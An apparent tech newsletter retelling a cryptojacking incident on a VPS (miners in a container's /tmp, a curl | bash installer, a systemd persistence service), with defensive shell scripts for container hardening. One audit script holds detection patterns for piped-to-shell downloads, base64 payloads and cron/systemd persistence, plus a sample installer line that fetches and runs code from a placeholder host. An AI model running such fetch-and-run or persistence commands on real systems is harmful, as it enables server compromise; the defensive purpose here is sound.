The AI and Tech Weekly: June 26, 2026

SECTION 1: LINKEDIN POST

🚨 My VPS was crypto-jacked after installing an “OpenClaw” alternative. Here is what happened and how to secure your Docker containers.

1️⃣ The Trigger: Hostinger CPU limitation alert. Running top showed 196% CPU usage.
2️⃣ The Discovery: Monero miners running in /tmp of my Next.js container.
3️⃣ The Attack vector: Classic curl | bash supply chain attack run as root, combined with MDX server-side rendering execution.
4️⃣ The Fix: Hardened docker-compose.yml with read-only filesystems, dropped capabilities, and noexec on /tmp.

Read the full technical breakdown, IoCs, and compose configurations: https://belghitis.com/digest/digest-2026-06-26

#devops #security #docker #selfhosted


📰 Stories Worth Your Attention

  1. Hostinger CPU Limitation alert reveals Monero mining activity inside container /tmp.
  2. Attackers gained persistence using a systemd service masquerading as openfang.
  3. Server-side rendering of MDX documents used as remote code execution entry point.
  4. Hardening container security is essential for self-hosted developer tools.

🛠 Tips and Tricks from the Community

  • Mount /tmp as a tmpfs with noexec,nosuid,size=50m in Docker Compose to block arbitrary binary execution.
  • Set read_only: true on your container service to prevent attackers from writing payload files.
  • Limit CPU and Memory resources per container to contain performance impact in case of a breach.

🔓 Open Source Pick of the Week

  • Bumblebee — A dependency scanner from Perplexity AI to verify third-party taps and packages without running install scripts.

SECTION 2: MEDIUM ARTICLE

My VPS Was Crypto-Jacked After Installing an “OpenClaw” Alternative

Sharing this with the community so you don’t make the same mistakes.

The Trigger

Hostinger sent a CPU limitation alert on my VPS. I SSHed in and ran top: my server was pegging 196% CPU. Nothing obvious in my own apps. Then I checked Docker:

docker exec myapp ls -lah /tmp

Three ELF binaries sitting in /tmp of my Next.js container, owned by the nextjs process user:

  • HelloMrMeeseeks
  • pls_pak_choi
  • plazooza

These were Monero miners running silently for days before triggering the CPU limit.
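The discovery step above came down to noticing native binaries in a directory where a Next.js app never writes them. The following script is an added example (not the author's code and not part of the original post): it scans a directory for files whose first four bytes are the ELF magic (7f 45 4c 46), which is the check that would have flagged the three files listed above regardless of their names. It assumes only POSIX sh, dd, od and tr; the sample directory it builds is constructed, and the fake "plazooza" file holds nothing but a header stub.

```shell
#!/bin/sh
# Added example, not from the original post: triage a directory (the container's
# /tmp in the post) for files that start with the ELF magic bytes 7f 45 4c 46,
# i.e. native executables that a Next.js app has no reason to drop there.
# Assumes only POSIX sh, dd, od and tr. The fixture below is constructed.

# Print the path of every regular file in $1 whose first four bytes are the ELF magic.
# Hidden files are included, because a miner has no reason to be polite about naming.
find_elf_files() {
  dir=$1
  for f in "$dir"/* "$dir"/.*; do
    [ -f "$f" ] || continue
    magic=$(dd if="$f" bs=4 count=1 2>/dev/null | od -An -tx1 | tr -d ' \n')
    if [ "$magic" = "7f454c46" ]; then
      printf '%s\n' "$f"
    fi
  done
  return 0
}

# Build a constructed sample directory: one fake ELF file (header bytes only, not a
# real program) named after one of the post's miners, beside two harmless files,
# one of which contains the letters "ELF" in its text to show the check is byte-based.
make_sample_dir() {
  d=${TMPDIR:-/tmp}/elfscan.$$
  mkdir -p "$d"
  printf '\177ELF\002\001\001' > "$d/plazooza"
  printf 'build notes\n' > "$d/notes.txt"
  printf 'ELF in text is not a header\n' > "$d/decoy.log"
  printf '%s\n' "$d"
}

# With a directory argument, scan it; without one, demonstrate on the fixture.
if [ -n "${1:-}" ]; then
  find_elf_files "$1"
else
  sample=$(make_sample_dir)
  echo "ELF binaries found in $sample:"
  find_elf_files "$sample"
  rm -rf "$sample"
fi
```

To run the same check inside a running container without installing anything in it, feed the script to the container's shell on stdin and pass the directory as a positional argument: `docker exec -i myapp sh -s /tmp < elfscan.sh`. Any hit in /tmp of a web app container is worth treating as an incident until explained.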

What the Attacker Did: Step by Step

  1. I opened the door myself: I ran a few tools on my production server as root without auditing their install scripts. Classic curl | bash supply-chain risk.
  2. Persistence: The installation script registered a systemd service called openfang that restart-looped, killing the CPU.
  3. RCE into Docker: Write access to a mounted host volume allowed the execution of arbitrary code inside the container, dropping miners into /tmp.
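The first step above, running an installer as root without reading it, is the one that is cheapest to prevent: save the script to disk and inspect it before executing it. The following audit is an added example (not the author's tooling and not part of the original post). It greps a saved installer for the behaviour described in step 2, registering a systemd unit for persistence, plus a few other common installer red flags, and prints one line per match. The pattern list is a constructed starting heuristic rather than a complete detector, and both sample installers are constructed fixtures with placeholder paths and an invalid URL; nothing in them is meant to be run. It assumes POSIX sh and grep -E.

```shell
#!/bin/sh
# Added example, not from the original post: a static pre-flight audit for an
# installer you were about to pipe into bash. Save the script to a file first
# (curl -fsSL URL -o install.sh), then run this over the file before deciding.
# The patterns cover the behaviour the post describes (a systemd unit named
# openfang registered for persistence) plus common installer red flags. They are
# a constructed starting list, not a complete detector. Assumes POSIX sh, grep -E.

# Print one line per matched pattern: "<match count>  <what it usually means>".
# Prints nothing for a file with no findings.
audit_install_script() {
  script=$1
  while IFS=';' read -r pattern why; do
    case $pattern in ''|'#'*) continue ;; esac
    n=$(grep -E -c -- "$pattern" "$script" 2>/dev/null || true)
    if [ "${n:-0}" -gt 0 ]; then
      printf '%s  %s\n' "$n" "$why"
    fi
  done <<'EOF'
# pattern (ERE) ; meaning
/etc/systemd/system;writes a systemd unit (reboot persistence, as with openfang)
systemctl[[:space:]]+(enable|daemon-reload);enables a service to survive reboot
(curl|wget)[^|]*[|][[:space:]]*(ba|da)?sh;nested curl/wget piped straight into a shell
base64[[:space:]]+(-d|--decode);decodes an embedded payload at install time
chmod[[:space:]]+\+x[[:space:]]+/tmp/;marks a file under /tmp executable
crontab[[:space:]]|/etc/cron;adds a cron entry
EOF
}

# Exit 0 only when the audit produced no findings.
install_script_is_clean() {
  [ -z "$(audit_install_script "$1")" ]
}

# Constructed sample of the kind of installer the post warns about: it registers a
# systemd service and chains a second download into sh. Paths and URL are placeholders.
write_risky_sample() {
  cat > "$1" <<'EOF'
#!/bin/sh
install -m 644 openfang.service /etc/systemd/system/openfang.service
systemctl daemon-reload
systemctl enable --now openfang
curl -fsSL https://example.invalid/stage2.sh | sh
EOF
}

# Constructed sample of an installer that stays inside the user's home directory.
write_clean_sample() {
  cat > "$1" <<'EOF'
#!/bin/sh
set -e
mkdir -p "$HOME/.local/bin"
cp ./agent "$HOME/.local/bin/agent"
echo "installed to $HOME/.local/bin"
EOF
}

# Demo: audit both fixtures.
tmp=${TMPDIR:-/tmp}/audit.$$
mkdir -p "$tmp"
write_risky_sample "$tmp/risky.sh"
write_clean_sample "$tmp/clean.sh"
for s in "$tmp/risky.sh" "$tmp/clean.sh"; do
  if install_script_is_clean "$s"; then
    echo "$s: no findings"
  else
    echo "$s: review before running"
    audit_install_script "$s"
  fi
done
rm -rf "$tmp"
```

A finding is a prompt to read that part of the script, not proof of malice: plenty of legitimate installers register a service. The point is that the decision is made before the script runs as root, not after a CPU alert.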

What I Fixed

I cleaned up the binaries, disabled the rogue systemd service, and hardened docker-compose.yml with:

  • read_only: true to lock down the filesystem.
  • tmpfs /tmp:noexec,nosuid,size=50m to prevent executing binaries from /tmp.
  • cpus: 1.0 and mem_limit: 512m to cap resource usage.
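The three compose settings listed here (and in the Tips section above) are easiest to understand side by side with the unhardened service they replace. The following is an added example, not the author's actual docker-compose.yml: a minimal "before" service, the "after" service carrying read_only, the noexec tmpfs, a cap_drop for the dropped capabilities the LinkedIn post mentions, and the CPU and memory caps, plus a grep-based check that reports any of those settings missing from a compose file. Service and image names are placeholders, and the check treats the YAML as text rather than parsing it.

```shell
#!/bin/sh
# Added example, not from the original post: the docker-compose.yml hardening the
# post describes, written out as a "before" and "after" service definition, with a
# grep-based check that confirms each setting is present. Service and image names
# are placeholders; the check reads the YAML as text and does not parse it.

# The kind of service definition that allowed payloads to be written and run.
write_weak_compose() {
  cat > "$1" <<'EOF'
services:
  myapp:
    image: myapp:latest
    ports:
      - "3000:3000"
    volumes:
      - ./content:/app/content
EOF
}

# The same service with the settings from the post applied.
write_hardened_compose() {
  cat > "$1" <<'EOF'
services:
  myapp:
    image: myapp:latest
    ports:
      - "3000:3000"
    volumes:
      - ./content:/app/content:ro       # the writable host volume was the entry point
    read_only: true                     # root filesystem cannot be written, so no payload can be dropped
    tmpfs:
      - /tmp:noexec,nosuid,size=50m     # scratch space still exists, but nothing in it can execute
    cap_drop:
      - ALL                             # drop every Linux capability the app does not need
    cpus: 1.0                           # a compromise cannot peg the host
    mem_limit: 512m
EOF
}

# Report each required setting as ok or MISSING; exit non-zero if anything is missing.
check_compose_hardening() {
  file=$1
  missing=0
  for req in 'read_only:[[:space:]]*true' '/tmp:[^[:space:]]*noexec' \
             '/tmp:[^[:space:]]*nosuid' 'cap_drop:' 'cpus:' 'mem_limit:'; do
    if grep -E -q -- "$req" "$file"; then
      printf 'ok       %s\n' "$req"
    else
      printf 'MISSING  %s\n' "$req"
      missing=$((missing + 1))
    fi
  done
  [ "$missing" -eq 0 ]
}

# Demo: write both files and check each.
tmp=${TMPDIR:-/tmp}/compose-check.$$
mkdir -p "$tmp"
write_weak_compose "$tmp/before.yml"
write_hardened_compose "$tmp/after.yml"
for f in "$tmp/before.yml" "$tmp/after.yml"; do
  echo "== $f"
  check_compose_hardening "$f" || echo "   -> fails the hardening check"
done
rm -rf "$tmp"
```

Run `check_compose_hardening docker-compose.yml` against your own file, then `docker compose config` to confirm the result still validates. If the app needs a writable path under read_only (a build cache, for example), add another tmpfs entry for that path rather than dropping read_only.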

Protect your servers: audit what you run, lock down your containers, and never run untrusted scripts as root.